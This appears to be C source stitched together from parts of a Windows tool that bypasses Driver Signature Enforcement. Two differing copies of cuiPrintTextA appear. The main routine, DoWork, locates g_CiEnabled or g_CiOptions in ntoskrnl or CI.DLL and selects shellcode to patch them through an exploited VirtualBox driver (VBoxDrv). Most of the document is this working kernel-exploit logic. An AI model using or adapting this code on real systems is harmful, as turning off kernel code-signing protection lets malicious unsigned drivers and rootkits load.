/* * cuiPrintTextA * * Purpose: * * Output text to the console or file. * ANSI version. * */ VOID cuiPrintTextA( _In_ LPSTR lpText, _In_ BOOL UseReturn ) { SIZE_T consoleIO; DWORD bytesIO; LPSTR Buffer; if (lpText == NULL) return; consoleIO = _strlen_a(lpText); if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) return; consoleIO = 5 + consoleIO; Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); if (Buffer) { _strcpy_a(Buffer, lpText); if (UseReturn) _strcat_a(Buffer, "\r\n"); consoleIO = _strlen_a(Buffer); if (g_ConsoleOutput != FALSE) { WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); } else { WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL); } HeapFree(GetProcessHeap(), 0, Buffer); } }
VOID ShowServiceMessage( LPSTR lpMsg ) { CHAR szBuffer[MAX_PATH * 2]; // // Validate input parameter. // if (lpMsg == NULL) { return; } if (_strlen_a(lpMsg) > MAX_PATH) { return; } // // Combine and output ODS message. // RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_a(szBuffer, "[DF] "); _strcat_a(szBuffer, lpMsg); OutputDebugStringA(szBuffer); }
/* * cuiPrintTextA * * Purpose: * * Output text to the console or file. * * ANSI variant * */ VOID cuiPrintTextA( _In_ HANDLE hOutConsole, _In_ LPSTR lpText, _In_ BOOL ConsoleOutputEnabled, _In_ BOOL UseReturn ) { SIZE_T consoleIO; DWORD bytesIO; LPSTR Buffer; if (lpText == NULL) return; consoleIO = _strlen_a(lpText); if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) return; consoleIO = consoleIO * sizeof(CHAR) + 4 + sizeof(UNICODE_NULL); Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); if (Buffer) { _strcpy_a(Buffer, lpText); if (UseReturn) _strcat_a(Buffer, "\r\n"); consoleIO = _strlen_a(Buffer); if (ConsoleOutputEnabled != FALSE) { WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); } else { WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL); } HeapFree(GetProcessHeap(), 0, Buffer); } }
BOOL DoWork( HANDLE hDevice, BOOL bDisable ) { BOOL bRes = FALSE, bFound, cond; ULONG rl = 0, c; LONG rel = 0; PVOID scBuffer = NULL, MappedKernel = NULL; ULONG_PTR KernelBase = 0L; SIZE_T ModuleSize; PLIST_ENTRY Head, Next; PLDR_DATA_TABLE_ENTRY Entry; PRTL_PROCESS_MODULES miSpace; CHAR KernelFullPathName[BUFFER_SIZE]; CHAR szOdsText[BUFFER_SIZE]; cond = FALSE; do { // // Enumerate loaded drivers. // miSpace = supGetSystemInfo(SystemModuleInformation); if (miSpace == NULL) { break; } if (miSpace->NumberOfModules == 0) { break; } RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName)); rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH); if (rl == 0) { break; } KernelFullPathName[rl] = (CHAR)'\\'; _strcpy_a(szOdsText, "[DF] Windows v"); ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText)); _strcat_a(szOdsText, "."); ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText)); OutputDebugStringA(szOdsText); // // For vista/7 find ntoskrnl.exe // bFound = FALSE; if (osv.dwMajorVersion == 6) { if (osv.dwMinorVersion < 2) { _strcpy_a(&KernelFullPathName[rl + 1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]); KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; bFound = TRUE; } } // // For 8+, 10 find CI.DLL // if (bFound == FALSE) { _strcpy_a(&KernelFullPathName[rl + 1], CI_DLL); for (c = 0; c < miSpace->NumberOfModules; c++) if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], CI_DLL) == 0) { KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase; break; } } HeapFree(GetProcessHeap(), 0, miSpace); miSpace = NULL; _strcpy_a(szOdsText, "[DF] Target module "); _strcat_a(szOdsText, KernelFullPathName); OutputDebugStringA(szOdsText); _strcpy_a(szOdsText, "[DF] Module base "); u64tohex_a(KernelBase, _strend_a(szOdsText)); OutputDebugStringA(szOdsText); // // Map ntoskrnl/CI.DLL in our address space. // MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES); if (MappedKernel == NULL) { break; } // // Check if we are in NT6.x branch // if (osv.dwMajorVersion == 6) { // // Find g_CiEnabled Vista, Seven // if (osv.dwMinorVersion < 2) { // // Query module size via PEB loader for bruteforce. // ModuleSize = 0; EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock); Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList; Next = Head->Flink; while (Next != Head) { Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks); if (Entry->DllBase == MappedKernel) { ModuleSize = Entry->SizeOfImage; break; } Next = Next->Flink; } LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock); // // Module not found, abort. // if (ModuleSize == 0) { break; } rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize); } else { // // Find g_CiOptions w8+ // rel = dsfQueryCiOptions(&KernelBase, MappedKernel); } } else { // // Otherwise > NT6.x, find g_CiOptions 10+ // rel = dsfQueryCiOptions(&KernelBase, MappedKernel); } if (rel == 0) break; _strcpy_a(szOdsText, "[DF] Apply patch to address "); u64tohex_a(KernelBase, _strend_a(szOdsText)); OutputDebugStringA(szOdsText); // // Select proper shellcode buffer // if (bDisable) { scBuffer = (PVOID)scDisable; } else { // //Shellcode for for 8/10+ // scBuffer = (PVOID)scEnable8Plus; if (osv.dwMajorVersion == 6) { // //Shellcode for vista, 7 // if (osv.dwMinorVersion < 2) { scBuffer = (PVOID)scEnableVista7; } } } // // Exploit VBoxDrv. // bRes = ControlDSE(hDevice, KernelBase, scBuffer); } while (cond); if (MappedKernel != NULL) { FreeLibrary(MappedKernel); } if (miSpace != NULL) { HeapFree(GetProcessHeap(), 0, miSpace); } return bRes; }